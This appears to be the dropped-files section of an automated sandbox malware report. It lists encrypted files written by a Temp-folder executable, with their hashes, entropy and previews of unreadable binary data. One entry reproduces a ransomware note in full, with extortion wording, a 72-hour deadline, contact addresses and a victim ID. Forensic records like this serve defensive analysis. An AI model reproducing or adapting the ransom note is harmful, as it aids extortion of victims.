                                                                                                                                              Preview:;..=...q.&.;......pi.E..P.O.p.fU.fU~|4{..f.v...f......|.o.!..!..o.=1..h !......%..J.4..>....Q.!.*.....0Nb..?V...At.C..N%..}Jt..4.u:...'...F.....!1..B1..g.(.G.....(....^e..Hj3vs...P~t.l.....mp..{...'s..../DSc...Q:.vf.m..Z......m^R..v..r.j.e..~.d..G..f.[:NY.V....I*...{UmI...w".N..V....F_:h_.{.e....=.8...........p..;.4......)>....*8..3.\.D.Z2.2y....BH....O(.uY......|.^O...n..FW.x9....{m.'7A..9.9.O...4S}Fw.R.h.I..X`B;u.Se..).9I...R6.G5....x...t*..E.....Qh....z....xp.;......T..~.G.@...Acf..[...P.\M.(n.f.?..rc./$J..;!Y..._..x..-..3.}.....Ae....V..7*.v..........1L.D.4.......;......Gx.{.,HF.F/..nz.u...&.....6l..q0;..*.$.}.V.k...0g...U..>..n0..b..\.=....F.."9;.(.% s..e.(K9.y.6PZ.n8.....E....!...~L..../.l.....T..k9 .(3....n......l' .C.........3.4&.3f....t?.>.._.4D...4..yz:0.....e..7.a.sZ.x..d....-...J}|a....^.".....d.....t6..5kn.M...2,*...c..J./Mo.47`h^. .9.ojY.I+-i=...F^...-.$w/.d/..X.N..!..!.-[.K.3_..........+t%."7..-}k.D!o...mh.Q.q`.(
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6999
                                                                                                                                              Entropy (8bit):7.435763441348311
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:nEvWusq9PxTANM4JFZhuh49cI4iRhuTJA6unSrDadBE8:nEvWuFKNtPZhuiKob1nSrDadBF
                                                                                                                                              MD5:4504258DE6065D36B696E979E9982AE9
                                                                                                                                              SHA1:36AEA27B44EF6DCA92C5FD113C4D574A82BEA504
                                                                                                                                              SHA-256:9F3222683411DC1688D0F28349A5055C2FE23191DFC449BAB4B7B6B560437C53
                                                                                                                                              SHA-512:991416183784A6416221CBD7A674F3F2DA97857EFFA390E99CF34F2E64438E6231E0E9E645626B523476434854C94A6770EA2F87CD1B27B1E996B72EE5A31F75
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.g..Y1H.-k.I...ZMG.,3n.<....&...w. .../9&.a......P......e..^....\.mj........q..!.k.Dp..Bl..E.&.!..GA.........Up.....j...v....2F.a......y...,E...e.'..o..|.vq.p...;...p.....n`...h.N.<...H.M..]i..4..J..{..=....^}..911~.q..M.>.....sz...].G.2..Pd..)4..W....y.5kc83....`...u!.Rb.rW...|{L.....m. Z.B.G...&.K60....+.s>^. Y......<SI..62..{..r.7.dX.!nG...6C,.....=..>.4...O.....P*.....4....Lb0...f.IGZ/e..8.z2....V.L....c...I..z.f.S..Y!....ILi|....b..Gk..h.(Q...s.F....qo>]y....i.t..z.Z..H...`d.l......l.......z.NhP...e..gSzC2......~..Atis.^...>.~.Q.sf..E.#.%L.....3.?....o.u..A...........#.....|.o.......t._...lt....6...2..x.W......._.6=a...D7.90..?o/z.L....^ZU..w.i.E.~..6%R{....<.6.O.......!.;RI-.)......?0..f....R.R.4..6.B..q'R..x..H.......\...Q...k..F....A.U..;v.|i...&(.......B|.V..P['........O4.i....Cr..8.1..4..vJ*.t.....m.V1.s&8.f....R:.1....=.....M.\E.O.f;...Z..h.....b..Qv.......9.j.............S[..94..]Z.h...+`.'.%...q...^.t7h....g...Q.$c
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6999
                                                                                                                                              Entropy (8bit):7.435763441348311
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:nEvWusq9PxTANM4JFZhuh49cI4iRhuTJA6unSrDadBE8:nEvWuFKNtPZhuiKob1nSrDadBF
                                                                                                                                              MD5:4504258DE6065D36B696E979E9982AE9
                                                                                                                                              SHA1:36AEA27B44EF6DCA92C5FD113C4D574A82BEA504
                                                                                                                                              SHA-256:9F3222683411DC1688D0F28349A5055C2FE23191DFC449BAB4B7B6B560437C53
                                                                                                                                              SHA-512:991416183784A6416221CBD7A674F3F2DA97857EFFA390E99CF34F2E64438E6231E0E9E645626B523476434854C94A6770EA2F87CD1B27B1E996B72EE5A31F75
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.g..Y1H.-k.I...ZMG.,3n.<....&...w. .../9&.a......P......e..^....\.mj........q..!.k.Dp..Bl..E.&.!..GA.........Up.....j...v....2F.a......y...,E...e.'..o..|.vq.p...;...p.....n`...h.N.<...H.M..]i..4..J..{..=....^}..911~.q..M.>.....sz...].G.2..Pd..)4..W....y.5kc83....`...u!.Rb.rW...|{L.....m. Z.B.G...&.K60....+.s>^. Y......<SI..62..{..r.7.dX.!nG...6C,.....=..>.4...O.....P*.....4....Lb0...f.IGZ/e..8.z2....V.L....c...I..z.f.S..Y!....ILi|....b..Gk..h.(Q...s.F....qo>]y....i.t..z.Z..H...`d.l......l.......z.NhP...e..gSzC2......~..Atis.^...>.~.Q.sf..E.#.%L.....3.?....o.u..A...........#.....|.o.......t._...lt....6...2..x.W......._.6=a...D7.90..?o/z.L....^ZU..w.i.E.~..6%R{....<.6.O.......!.;RI-.)......?0..f....R.R.4..6.B..q'R..x..H.......\...Q...k..F....A.U..;v.|i...&(.......B|.V..P['........O4.i....Cr..8.1..4..vJ*.t.....m.V1.s&8.f....R:.1....=.....M.\E.O.f;...Z..h.....b..Qv.......9.j.............S[..94..]Z.h...+`.'.%...q...^.t7h....g...Q.$c
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):41553
                                                                                                                                              Entropy (8bit):5.851066829409383
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:gsyfadWsd4wa82eOmWmcjLk1wk6JVINoXzFS5aRg:g0WY6x1xm6JVINoXzFS5z
                                                                                                                                              MD5:1EDC75D4ABEBD789FB813512A132BFD6
                                                                                                                                              SHA1:445ED8D0B892F16014D52B7DC423D131D2F05A48
                                                                                                                                              SHA-256:660C88F1BEE23A7B3F8A658B5F0CC3040629BA341F046CC9BD91330679F35D5A
                                                                                                                                              SHA-512:3A9689C77956CAC13655A9507534B24F6239717649135524EC28FA86F058BC97E0E0BE607AA7D692F51EA8F390AF112E31E2144B2D9383419795B20A2C6F1FB1
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.....]!G3.cb....f...\V..J.D.......S..!1..|jRb..s.?...X...!Z..tG...QXn..8...~..&.Z~U.. ...4......'t...*2..(z.A.rO'.#l..V....f..V.Z.R..8J.H.>.\.M..[|..2..U..\|.@KaM..s|...w.d..9.E.%..'e|....N......kL.."....6....1..S.."f.<.av.L.......P........X^h.F.P...W...Us=.....G....Y....c[xX...C..KO..`mtI.3{.,...,-.xg..#.fHM...y\.._.{...9ai...7.ay"+.......w.^.(.l.....L..c....'....`.+w6.@.B.:..l...;a...>.a=...$... Q......ecJV...g.@.#.5.&lM..$P...q-....w....|....o.....d..sFA_}..v8..c........`...B.QT.s%.c...fe...........9.h.n6..0r...q.F..{p.,......G).V.h-Op..(.@.T.3..".......F,l.A.......#n......"*..Uhi..........s...t....D...0..AQ@wV..*.x..S.c.....N..T s..<.e....)e[4Icf..`.C..M to.=.!HHWk.......".A.....q...S.~.e.b...N.......zW.A..x..h.E?..{...O(........FI.S...R..t<.=.ZU..r...!5..TZ..~......]uB=JeT..n...`.!.....6..1.9K.7...J..s@.m.".ncc...m.xd..Y..?....q...o['../=+.."..q.H.....~.n;+..>.]s.9D\..??.K..WJ.+..b.......r...B.s....q/K..+..-.rU..09!..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):41553
                                                                                                                                              Entropy (8bit):5.851066829409383
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:gsyfadWsd4wa82eOmWmcjLk1wk6JVINoXzFS5aRg:g0WY6x1xm6JVINoXzFS5z
                                                                                                                                              MD5:1EDC75D4ABEBD789FB813512A132BFD6
                                                                                                                                              SHA1:445ED8D0B892F16014D52B7DC423D131D2F05A48
                                                                                                                                              SHA-256:660C88F1BEE23A7B3F8A658B5F0CC3040629BA341F046CC9BD91330679F35D5A
                                                                                                                                              SHA-512:3A9689C77956CAC13655A9507534B24F6239717649135524EC28FA86F058BC97E0E0BE607AA7D692F51EA8F390AF112E31E2144B2D9383419795B20A2C6F1FB1
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.....]!G3.cb....f...\V..J.D.......S..!1..|jRb..s.?...X...!Z..tG...QXn..8...~..&.Z~U.. ...4......'t...*2..(z.A.rO'.#l..V....f..V.Z.R..8J.H.>.\.M..[|..2..U..\|.@KaM..s|...w.d..9.E.%..'e|....N......kL.."....6....1..S.."f.<.av.L.......P........X^h.F.P...W...Us=.....G....Y....c[xX...C..KO..`mtI.3{.,...,-.xg..#.fHM...y\.._.{...9ai...7.ay"+.......w.^.(.l.....L..c....'....`.+w6.@.B.:..l...;a...>.a=...$... Q......ecJV...g.@.#.5.&lM..$P...q-....w....|....o.....d..sFA_}..v8..c........`...B.QT.s%.c...fe...........9.h.n6..0r...q.F..{p.,......G).V.h-Op..(.@.T.3..".......F,l.A.......#n......"*..Uhi..........s...t....D...0..AQ@wV..*.x..S.c.....N..T s..<.e....)e[4Icf..`.C..M to.=.!HHWk.......".A.....q...S.~.e.b...N.......zW.A..x..h.E?..{...O(........FI.S...R..t<.=.ZU..r...!5..TZ..~......]uB=JeT..n...`.!.....6..1.9K.7...J..s@.m.".ncc...m.xd..Y..?....q...o['../=+.."..q.H.....~.n;+..>.]s.9D\..??.K..WJ.+..b.......r...B.s....q/K..+..-.rU..09!..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):758
                                                                                                                                              Entropy (8bit):7.68014483438083
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:kM6x/uBbXPwOGki00Qn0VzkCT6AQDp2GxOJIjeVT/5HZeBevP69hnNXi1CuXPPIv:kM6luBzGVM05QDEGxOKjej5eMP6DnNXL
                                                                                                                                              MD5:071D54AE77DE6DB05D4972D57B0420C1
                                                                                                                                              SHA1:063287A66972C883C4F53CE3CBBDF402CA120BAE
                                                                                                                                              SHA-256:B9019ED059A410EE0F6BA83AC1A588CB12D58809811E157B8BB9A5EA74E3F4C6
                                                                                                                                              SHA-512:F05194CB6B598295804E8D71C1F3F5E79730BE32E541DD93B4E3CB14C2E3EC53E93B98C68C7BCA17F71C86E0342E20F6B4F85EB7AAEC3F85306C9C733537491F
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.8[.........f.@..w.....}..8._......>..`..].j.+w.>T4dd!....?....j8..b....i......>..S.....1..8=R.g..CE>...$.<..{O.9....SC............X.~5z...X...^..T.=xBz..[.@i..p....".Q..r'....Q...b.u."u.m..5 .G..1o...L........&.A...>.d..n.G~.$[....-U.....;1'.........NP/..)L1..xMn.3....5q..2.u.OVi>YYY)r .yK..ur.........W.0...;........"...SP...~ {.p.g....M......c1-f....Du..?..}p-.....<.)&4b..'.j.]..t.Y4U...8..V.tx...9...i..1....g..."...L..j2..ay.............d.T.o.k.8787d8846c"}2..rZ..S...\...b..9M/.tz.{l..\.L..yw{a..'.;.^g.'.7...z...P....c....?........j...F..E.i}..............>..[.b..1..I2.#*u4$...I".22ed...M..~..x.K.6...PA'g..R5........+U...5"^zg....Q"(.....e..zM.z..F..j..>eim*.R..C .E.......q.SU.9c.W.eG'..wJ..F..YH0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):758
                                                                                                                                              Entropy (8bit):7.68014483438083
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:12:kM6x/uBbXPwOGki00Qn0VzkCT6AQDp2GxOJIjeVT/5HZeBevP69hnNXi1CuXPPIv:kM6luBzGVM05QDEGxOKjej5eMP6DnNXL
                                                                                                                                              MD5:071D54AE77DE6DB05D4972D57B0420C1
                                                                                                                                              SHA1:063287A66972C883C4F53CE3CBBDF402CA120BAE
                                                                                                                                              SHA-256:B9019ED059A410EE0F6BA83AC1A588CB12D58809811E157B8BB9A5EA74E3F4C6
                                                                                                                                              SHA-512:F05194CB6B598295804E8D71C1F3F5E79730BE32E541DD93B4E3CB14C2E3EC53E93B98C68C7BCA17F71C86E0342E20F6B4F85EB7AAEC3F85306C9C733537491F
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.8[.........f.@..w.....}..8._......>..`..].j.+w.>T4dd!....?....j8..b....i......>..S.....1..8=R.g..CE>...$.<..{O.9....SC............X.~5z...X...^..T.=xBz..[.@i..p....".Q..r'....Q...b.u."u.m..5 .G..1o...L........&.A...>.d..n.G~.$[....-U.....;1'.........NP/..)L1..xMn.3....5q..2.u.OVi>YYY)r .yK..ur.........W.0...;........"...SP...~ {.p.g....M......c1-f....Du..?..}p-.....<.)&4b..'.j.]..t.Y4U...8..V.tx...9...i..1....g..."...L..j2..ay.............d.T.o.k.8787d8846c"}2..rZ..S...\...b..9M/.tz.{l..\.L..yw{a..'.;.^g.'.7...z...P....c....?........j...F..E.i}..............>..[.b..1..I2.#*u4$...I".22ed...M..~..x.K.6...PA'g..R5........+U...5"^zg....Q"(.....e..zM.z..F..j..>eim*.R..C .E.......q.SU.9c.W.eG'..wJ..F..YH0xABADCABA
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):37781
                                                                                                                                              Entropy (8bit):5.905766767940029
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:c5gxGcspgmSuHAHbbPiDMWy6kT3pNoXzFS5EA:c52Gcsp1xgSIWy6kT3pNoXzFS5B
                                                                                                                                              MD5:E5B3E24FF554C3EE113F644B3060CFE0
                                                                                                                                              SHA1:720CDECAA4ECDF14B4CA64BFF5C888D8515780B4
                                                                                                                                              SHA-256:D4F4F465520FE8736E32D75DC028305D3037D4FA47BCB73863669FA8788CFF9F
                                                                                                                                              SHA-512:3641BC3AF14B181EDFDAFD16BD9748BB1E05CF1E04FE34D53B82BB7D0C6B9CA6AA039AEDB54C294C7A21C5C1058FECB3EB3EBA6C795FED6104B2773CF8F9037D
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:(....)J..h*.y....O.....x..6.#......U.B.XS.....g....D#.)../.R.o.\m]...A....V.!...+.@:\]`..{....x...`3.#^.........N...4.A..O..... .)jg......8`.."......].1sn9...N..N....2.....-.p...u.....F...>.Y.>......HL.b.j....V.I2!...Z..0..(......QBV..EK.oiP...m......_2~...b.....(....<.....Q.a.:C|p...i.e.../.>.:.U..3m-...y.~)<j.."......0.#..5c....p....'.z=.....]`.-84....V..H...dXU3..&......1CZX.`.(6.A..7...:Q..*..Z.6.&6.........=.w.sE.[..*............+....be*.....s..V.oIZ..x..........1Z.,.G......p....8.z..0B...#9I...0x}.B.J^...:. .......,.R.X^...~|.1...L.4../h......./?....q..Z.3.../...nw..tN..BH...<u.h!Si.5Jc4Gb....<nOM..f..)_{'..9..q....w..z.x.{.9$.?d....y.5.. b.qr.2A.o...(}.,.%.N..I..>..U;......5Z........5E+..w!.iI7#....1ULE.....!P:....i2....aGy.....9T..\..b`:\fBe...f..U.I..>......4.rjh...z1P..F...M......2O7.......e.C..... .j......$.tB{.......Q..#.'/.]`.y.!...... P[[... O{t.N......~.......=.;...vb....3.C...*~..7........k.%..a.p..Z[...S.V.. .zEh..B.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):37781
                                                                                                                                              Entropy (8bit):5.905766767940029
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:c5gxGcspgmSuHAHbbPiDMWy6kT3pNoXzFS5EA:c52Gcsp1xgSIWy6kT3pNoXzFS5B
                                                                                                                                              MD5:E5B3E24FF554C3EE113F644B3060CFE0
                                                                                                                                              SHA1:720CDECAA4ECDF14B4CA64BFF5C888D8515780B4
                                                                                                                                              SHA-256:D4F4F465520FE8736E32D75DC028305D3037D4FA47BCB73863669FA8788CFF9F
                                                                                                                                              SHA-512:3641BC3AF14B181EDFDAFD16BD9748BB1E05CF1E04FE34D53B82BB7D0C6B9CA6AA039AEDB54C294C7A21C5C1058FECB3EB3EBA6C795FED6104B2773CF8F9037D
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:(....)J..h*.y....O.....x..6.#......U.B.XS.....g....D#.)../.R.o.\m]...A....V.!...+.@:\]`..{....x...`3.#^.........N...4.A..O..... .)jg......8`.."......].1sn9...N..N....2.....-.p...u.....F...>.Y.>......HL.b.j....V.I2!...Z..0..(......QBV..EK.oiP...m......_2~...b.....(....<.....Q.a.:C|p...i.e.../.>.:.U..3m-...y.~)<j.."......0.#..5c....p....'.z=.....]`.-84....V..H...dXU3..&......1CZX.`.(6.A..7...:Q..*..Z.6.&6.........=.w.sE.[..*............+....be*.....s..V.oIZ..x..........1Z.,.G......p....8.z..0B...#9I...0x}.B.J^...:. .......,.R.X^...~|.1...L.4../h......./?....q..Z.3.../...nw..tN..BH...<u.h!Si.5Jc4Gb....<nOM..f..)_{'..9..q....w..z.x.{.9$.?d....y.5.. b.qr.2A.o...(}.,.%.N..I..>..U;......5Z........5E+..w!.iI7#....1ULE.....!P:....i2....aGy.....9T..\..b`:\fBe...f..U.I..>......4.rjh...z1P..F...M......2O7.......e.C..... .j......$.tB{.......Q..#.'/.]`.y.!...... P[[... O{t.N......~.......=.;...vb....3.C...*~..7........k.%..a.p..Z[...S.V.. .zEh..B.
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8696
                                                                                                                                              Entropy (8bit):7.1367036835694835
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:PkHtH8DM/9HxYaKdgtn9JA6unSrDtTZd/Sac:cNHZcaK1nSrDhZd/G
                                                                                                                                              MD5:AC213A422CF2EB99B5108DB62B61F8A5
                                                                                                                                              SHA1:100620EF1AC30F1FECAA8F1006706FBDB5CBC58D
                                                                                                                                              SHA-256:B04525414013F98F0DA217F89C2AE6939F0A2A01623CAA6563D3B3565ED4BFDF
                                                                                                                                              SHA-512:5CB662EACB0D14803750CDD9F8B925517115C598E5E4CAED939E915B3C89704E48A55F911F193EBB7749CF0319CFCA01D0F44ADB7FB14D53D9E9D6A0A4E3AD69
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:.}#2P/.`.#.D..rw...?\.J:v..$....U..p(...'.O....*F..uT..[...sIW0!.....%...m.(.Im.5(.....&. ....hH....'.a..8......j...#l.Q...X^.....K.<.."..3..f..E.. .....\.@Ty...s..4.x.Yw.........Ke.).'.....j...,SLt0]5Tp...G..nd).T.P..-|..6..(.q.........K.r..I.".]..j2.oP=N...-*.*~.%.x.D........6;)./mOT...d.WH.I.0.16.3.WJ.b..l.].`......v..z..v...&O...^.......)Z..:]......>...x...O..3..<..........m.....x.Y...>\...\........^...3.EC.ZPJ.>rf6.G.!..1D...`...4...`...........R....w.u.%.2rE.e.....Oa.P....y..X.... .]....:M..7....2..|..p..*...S..7.@..8t.].}..(~..]...D..(...3.M..^.$.D.dR.E..mS.Q@.pp...5..qo..a....3*....\.9...H.g.&.H).7.g.#..7.-..)K.y.={.......lQN..Hh..d..e..zi.[.#..,.NzL...]..W.7....9..............Y.....,..yz..VF....z[....y..S....U%F..6...bSH.w.LF.....1.u..u`1..`.....r._/..f....Wn..._....WT.......].t.<6h..I.[m&F..,|0.O..a..ujKj@[\H...4...<Rg..$}/.X. E~~.N.W;..?i....o.?A.,).7.:Cg.8....V....*(..........<s...O 2....[$Ym)RVf..A....b.A.[R.9.'FF.P+\...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8696
                                                                                                                                              Entropy (8bit):7.1367036835694835
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:PkHtH8DM/9HxYaKdgtn9JA6unSrDtTZd/Sac:cNHZcaK1nSrDhZd/G
                                                                                                                                              MD5:AC213A422CF2EB99B5108DB62B61F8A5
                                                                                                                                              SHA1:100620EF1AC30F1FECAA8F1006706FBDB5CBC58D
                                                                                                                                              SHA-256:B04525414013F98F0DA217F89C2AE6939F0A2A01623CAA6563D3B3565ED4BFDF
                                                                                                                                              SHA-512:5CB662EACB0D14803750CDD9F8B925517115C598E5E4CAED939E915B3C89704E48A55F911F193EBB7749CF0319CFCA01D0F44ADB7FB14D53D9E9D6A0A4E3AD69
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:.}#2P/.`.#.D..rw...?\.J:v..$....U..p(...'.O....*F..uT..[...sIW0!.....%...m.(.Im.5(.....&. ....hH....'.a..8......j...#l.Q...X^.....K.<.."..3..f..E.. .....\.@Ty...s..4.x.Yw.........Ke.).'.....j...,SLt0]5Tp...G..nd).T.P..-|..6..(.q.........K.r..I.".]..j2.oP=N...-*.*~.%.x.D........6;)./mOT...d.WH.I.0.16.3.WJ.b..l.].`......v..z..v...&O...^.......)Z..:]......>...x...O..3..<..........m.....x.Y...>\...\........^...3.EC.ZPJ.>rf6.G.!..1D...`...4...`...........R....w.u.%.2rE.e.....Oa.P....y..X.... .]....:M..7....2..|..p..*...S..7.@..8t.].}..(~..]...D..(...3.M..^.$.D.dR.E..mS.Q@.pp...5..qo..a....3*....\.9...H.g.&.H).7.g.#..7.-..)K.y.={.......lQN..Hh..d..e..zi.[.#..,.NzL...]..W.7....9..............Y.....,..yz..VF....z[....y..S....U%F..6...bSH.w.LF.....1.u..u`1..`.....r._/..f....Wn..._....WT.......].t.<6h..I.[m&F..,|0.O..a..ujKj@[\H...4...<Rg..$}/.X. E~~.N.W;..?i....o.?A.,).7.:Cg.8....V....*(..........<s...O 2....[$Ym)RVf..A....b.A.[R.9.'FF.P+\...
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4165
                                                                                                                                              Entropy (8bit):4.793237544333736
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:96:cvNlHaKqHidXtV8TTU+2SUw/6sJl0Xs403ay3Id7Hf:Qn6FH4eTU+2zwysJl0Xs40X4d7Hf
                                                                                                                                              MD5:4B259C0407539130EF482A2BA2704103
                                                                                                                                              SHA1:A679D0E6E16F132CD4709B175AC1647E9E98E8A4
                                                                                                                                              SHA-256:A1A7C610B7254AF2B5A7F8B905C2FAA1FE0EAFA68F6AFCF6F8D58B6FBB5B2CA7
                                                                                                                                              SHA-512:C91C60CB551598268328E43D98D5DC1F0FFCC8E3BEC9AAEB72AF0426E48F1912E479B3C955DC45286C47A1B742B6FC0FD4442446B6E4A83311696C2081F6348C
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :1B4910FA33AB622F7DC5D2AF0A960A05D154D5BC18A850AA28E4EFBAFFD77A4EA585193EAC8A427D137B0A23A019DFA2A7CE8D5EE6EB631E5F2FE2F9AE9B2C338BEC79491D4D2AD0DE16280DB3F138734412798A3519E1FDF6E6855423C
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):37771
                                                                                                                                              Entropy (8bit):5.901701234208403
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:7Ru8nGgmSuHAHbbPiDMWy6kT3pNoXzFS5EG:708G1xgSIWy6kT3pNoXzFS5r
                                                                                                                                              MD5:D54CDE5274A363E42D340F002FF68643
                                                                                                                                              SHA1:3695F65858AC6F0E1B6375A33D19C57DAEB808B5
                                                                                                                                              SHA-256:6EAD822897C1A86BD81D1F5A716DED5C995806ABD9CE5D290BCE83B7E23BA53B
                                                                                                                                              SHA-512:A86B5832D84B5BB23A5324264F8313D59473E4EC1C8EAEC56740F14490402CE240B920D516F971A2C7DD9525149F8933808BB63F137EDD5E5A985C79594D9B38
                                                                                                                                              Malicious:true
                                                                                                                                              Preview:/...i.q..y"+.o^.nh2o!o.[ND;..,.C.}.;.....b...@b.}wU+..p@.e)..Hb.......w......=..I.<f......,.+..E....'f.P...........;.P...R,.H.W.w..i..B...O..FM..:+d..}..N.ik....'....$..TsN..JQC...i.2..$x..G..7...a.~....P.b.....o..Q..E.L.........v5*.......#.~+..-]_9'....#.,..V.f..!...:..(.ok#...T..CY.7...a..)..u.d.J..c..[..zo... j..W..S...>_......%...D...D.#.\1&..e.....[u2..b5KmAY...pk..C.... .((!9..-r.p..9#.!...}..,1..Zd.iE....P.E..=...g.....*J......l.]B....Qos....B$a.....F.H).'.f.6...M.D.t`\Y.1.Vr|(.0..zx..2.$MML._".\..B......Z.v2.O..x....;N...K2.$...........#..c.....f.'.P.Z.2.c{..N[.........T........pYX(......@.....9..k..?p..%U.ii...z.z....[.".drld!..&!..8`.....@...P.28.X.p%.A.X..S.......9.)+.......R....D..S.%..i.z.7.y...x;.p.{>.d.....w.+g...#s....=t.....A:.2G7.5........\m........[.N.N..m...f..1.......VS.(rpJA.3.........y7y~7XO.Xo..[?......tM.Y..W.n....E...0..W6.....,...L.#"cx.^l.[b....._Xp.Q.....p.'.93.B....Bc...c.W-.....b.L.s{S[.....j...u....j&...=;.{..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):37771
                                                                                                                                              Entropy (8bit):5.901701234208403
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:7Ru8nGgmSuHAHbbPiDMWy6kT3pNoXzFS5EG:708G1xgSIWy6kT3pNoXzFS5r
                                                                                                                                              MD5:D54CDE5274A363E42D340F002FF68643
                                                                                                                                              SHA1:3695F65858AC6F0E1B6375A33D19C57DAEB808B5
                                                                                                                                              SHA-256:6EAD822897C1A86BD81D1F5A716DED5C995806ABD9CE5D290BCE83B7E23BA53B
                                                                                                                                              SHA-512:A86B5832D84B5BB23A5324264F8313D59473E4EC1C8EAEC56740F14490402CE240B920D516F971A2C7DD9525149F8933808BB63F137EDD5E5A985C79594D9B38
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:/...i.q..y"+.o^.nh2o!o.[ND;..,.C.}.;.....b...@b.}wU+..p@.e)..Hb.......w......=..I.<f......,.+..E....'f.P...........;.P...R,.H.W.w..i..B...O..FM..:+d..}..N.ik....'....$..TsN..JQC...i.2..$x..G..7...a.~....P.b.....o..Q..E.L.........v5*.......#.~+..-]_9'....#.,..V.f..!...:..(.ok#...T..CY.7...a..)..u.d.J..c..[..zo... j..W..S...>_......%...D...D.#.\1&..e.....[u2..b5KmAY...pk..C.... .((!9..-r.p..9#.!...}..,1..Zd.iE....P.E..=...g.....*J......l.]B....Qos....B$a.....F.H).'.f.6...M.D.t`\Y.1.Vr|(.0..zx..2.$MML._".\..B......Z.v2.O..x....;N...K2.$...........#..c.....f.'.P.Z.2.c{..N[.........T........pYX(......@.....9..k..?p..%U.ii...z.z....[.".drld!..&!..8`.....@...P.28.X.p%.A.X..S.......9.)+.......R....D..S.%..i.z.7.y...x;.p.{>.d.....w.+g...#s....=t.....A:.2G7.5........\m........[.N.N..m...f..1.......VS.(rpJA.3.........y7y~7XO.Xo..[?......tM.Y..W.n....E...0..W6.....,...L.#"cx.^l.[b....._Xp.Q.....p.'.93.B....Bc...c.W-.....b.L.s{S[.....j...u....j&...=;.{..
                                                                                                                                              Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):6992
                                                                                                                                              Entropy (8bit):7.445905478467392
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:iORCwkNSTv5cG2EQGa99F6YJA6unSrDadW4Xm:GwkNSTh2EYD6L1nSrDadWR
                                                                                                                                              MD5:76842BEE04A33CF2BA8B3D7BB220D451
                                                                                                                                              SHA1:974A3ECF9FAA84571B2CC6E8429BC5B5E1CC9272
                                                                                                                                              SHA-256:F3D4A2CCAA36A6C02EFA3413ED3514C963DAC81C6F9DB9CB4079C3EC26A4640C
